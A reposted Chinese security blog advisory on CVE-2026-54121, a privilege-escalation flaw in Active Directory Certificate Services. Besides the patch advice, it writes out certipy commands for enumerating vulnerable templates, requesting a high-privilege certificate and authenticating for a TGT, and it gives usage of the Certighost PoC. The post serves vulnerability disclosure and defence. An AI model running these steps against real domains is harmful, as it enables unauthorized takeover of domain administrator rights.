文章总结: ActiveDirectory证书服务存在授权不当漏洞CVE-2026-54121,CVSS评分8.8,普通域用户可通过构造特定证书签名请求提升至域管理员权限。公开PoC工具Certighost已发布,攻击链包括枚举脆弱模板、申请高权限证书并认证获取TGT。建议立即安装微软2026年7月安全更新或禁用不必要的ADCS角色服务。 综合评分: 90 文章分类: 漏洞分析,渗透测试,红队,漏洞预警,安全工具
AD CS 又出洞!Certighost 权限提升 PoC 公开 CVE-2026-54121
原创
ikun ikun
爱坤sec
2026年7月27日 02:30 马来西亚
在小说阅读器读本章
去阅读
AD CS 又出洞!Certighost 权限提升 PoC 公开
CVE-2026-54121 Active Directory 证书服务授权不当 CVSS 8.8
⚠️ CVSS 8.8 HIGH
攻击向量:网络 | 攻击复杂度:低 | 所需权限:普通域用户 | 用户交互:无
漏洞描述
Active Directory 证书服务(AD CS)存在授权不当漏洞(CWE-285),拥有普通域权限的攻击者可利用该漏洞在网络中提升权限至域管理员级别。
继之前的 ESC 系列漏洞(ESC1-ESC14)和 Certifried 之后,AD CS 再次被发现严重授权缺陷。公开 PoC 名为 Certighost,已有 177 星。
影响版本
产品:Active Directory 证书服务(AD CS)
类型:Windows Server 组件
CWE:CWE-285(授权不当)
补丁:Microsoft 2026年7月安全更新
修复方案
安装 Microsoft 2026年7月安全更新,或禁用不必要的 AD CS 角色服务。
漏洞分析
AD CS 在证书请求和签发的授权校验中存在逻辑缺陷。普通域用户可以通过构造特定的证书签名请求(CSR),利用 CA 服务器的不当授权策略,申请到具有高权限的证书。
攻击链如下:
Step 1. 枚举 AD CS 服务器和证书模板
certipy find -u [email protected] -p password -dc-ip 10.0.0.1
Step 2. 利用不当授权模板申请高权限证书
certipy req -u [email protected] -p password -ca CA-SERVER
-template VulnTemplate -target domain.local
Step 3. 使用获取的证书请求身份认证
certipy auth -pfx certificate.pfx -dc-ip 10.0.0.1
Step 4. 获得高权限 TGT,完成权限提升
漏洞复现
Certighost PoC 使用
git clone https://github.com/aniqfakhrul/CVE-2026-54121.git
cd CVE-2026-54121
pip install -r requirements.txt
# 枚举脆弱的 AD CS 服务器
python certighost.py enumerate -u domain\\user -p password -dc dc.domain.local
# 提权利用
python certighost.py exploit -u domain\\user -p password -ca CA-SERVER \
-dc dc.domain.local -target domain.local
PoC 仓库
https://github.com/aniqfakhrul/CVE-2026-54121 (⭐177)
https://github.com/tc4dy/CVE-2026-54121-PoC-Exploit
参考链接
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-54121
MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121
⚠️ 安全提示
本文仅用于安全研究与学习目的。请勿用于非法用途。请在获得授权后的环境中进行测试。
— EOF —
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:爱坤sec ikun ikun《AD CS 又出洞!Certighost 权限提升 PoC 公开 CVE-2026-54121》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论